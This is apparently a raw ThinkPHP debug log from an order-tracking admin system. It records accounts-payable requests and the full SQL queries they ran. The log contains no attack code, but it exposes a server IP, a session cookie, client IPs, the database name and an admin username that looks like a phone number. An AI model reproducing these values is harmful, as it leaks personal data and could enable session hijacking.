RunTime:0.000883s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.000866s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.002479s ] --------------------------------------------------------------- [ 2022-07-20T17:12:27+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.095254s][吞吐率:10.50req/s] [内存消耗:5,438.78kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001301s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '33', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001835s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006965s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000333s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001366s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000589s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001515s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001012s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000978s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001739s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.001609s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001284s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308347) [ RunTime:0.004577s ] --------------------------------------------------------------- [ 2022-07-20T17:12:32+08:00 ] 106.112.205.110 POST /admin/financial/accountspayable/getTotal [ info ] 47.105.33.115:8081/admin/financial/accountspayable/getTotal [运行时间:0.060498s][吞吐率:16.53req/s] [内存消耗:5,439.28kb] [文件加载:87] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001103s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'getTotal', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '51', 'accept' => '*/*', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'suppliercustomername' => '德邦', 'workername' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001508s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->getTotal[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006615s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000352s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001513s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000377s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001497s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000990s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000975s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '德邦' ) LIMIT 1 [ RunTime:0.001287s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del,sum(accountspayable.paid_money) as totalMoney FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) AND ( suppliercustomer.name = '德邦' ) LIMIT 1 [ RunTime:0.001185s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001163s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"suppliercustomername\":\"\\u5fb7\\u90a6\",\"workername\":\"\"}' , '/admin/financial/accountspayable/getTotal' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.205.110' , 1658308352) [ RunTime:0.004337s ] --------------------------------------------------------------- [ 2022-07-20T17:12:32+08:00 ] 106.112.205.110 GET /admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E5%BE%B7%E9%82%A6%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658308346107 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/choosecustom?sort=id&order=desc&offset=0&limit=10&filter=%7B%22suppliercustomer.name%22%3A%22%E5%BE%B7%E9%82%A6%22%7D&op=%7B%22suppliercustomer.name%22%3A%22%3D%22%7D&_=1658308346107 [运行时间:0.092010s][吞吐率:10.87req/s] [内存消耗:5,688.66kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001124s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'choosecustom', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/choosecustom?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=beqitvd4ngvh7bvt2eeg55qvf0', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"suppliercustomer.name":"德邦"}', 'op' => '{"suppliercustomer.name":"="}', '_' => '1658308346107', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001564s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->choosecustom[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000145s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000483s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.001518s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000455s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.001404s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001251s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001960s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000386s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.001369s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001041s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.001112s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '德邦' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.001074s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE ( `suppliercustomer`.`name` = '德邦' ) AND `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.001750s ] --------------------------------------------------------------- [ 2022-07-20T17:12:35+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021190s][吞吐率:47.19req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001107s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:35+08:00 ] 221.192.178.45 GET / [ info ] 47.105.33.115:8081/ [运行时间:0.029357s][吞吐率:34.06req/s] [内存消耗:3,333.20kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000056s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001234s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001592s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000090s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:35+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020448s][吞吐率:48.90req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001180s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:35+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.021955s][吞吐率:45.55req/s] [内存消耗:2,225.83kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001203s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 10; AQM-AL00 Build/HUAWEIAQM-AL00)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T17:12:35+08:00 ] 221.192.178.45 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.018640s][吞吐率:53.65req/s] [内存消耗:2,225.83kb] [文件加载:51] 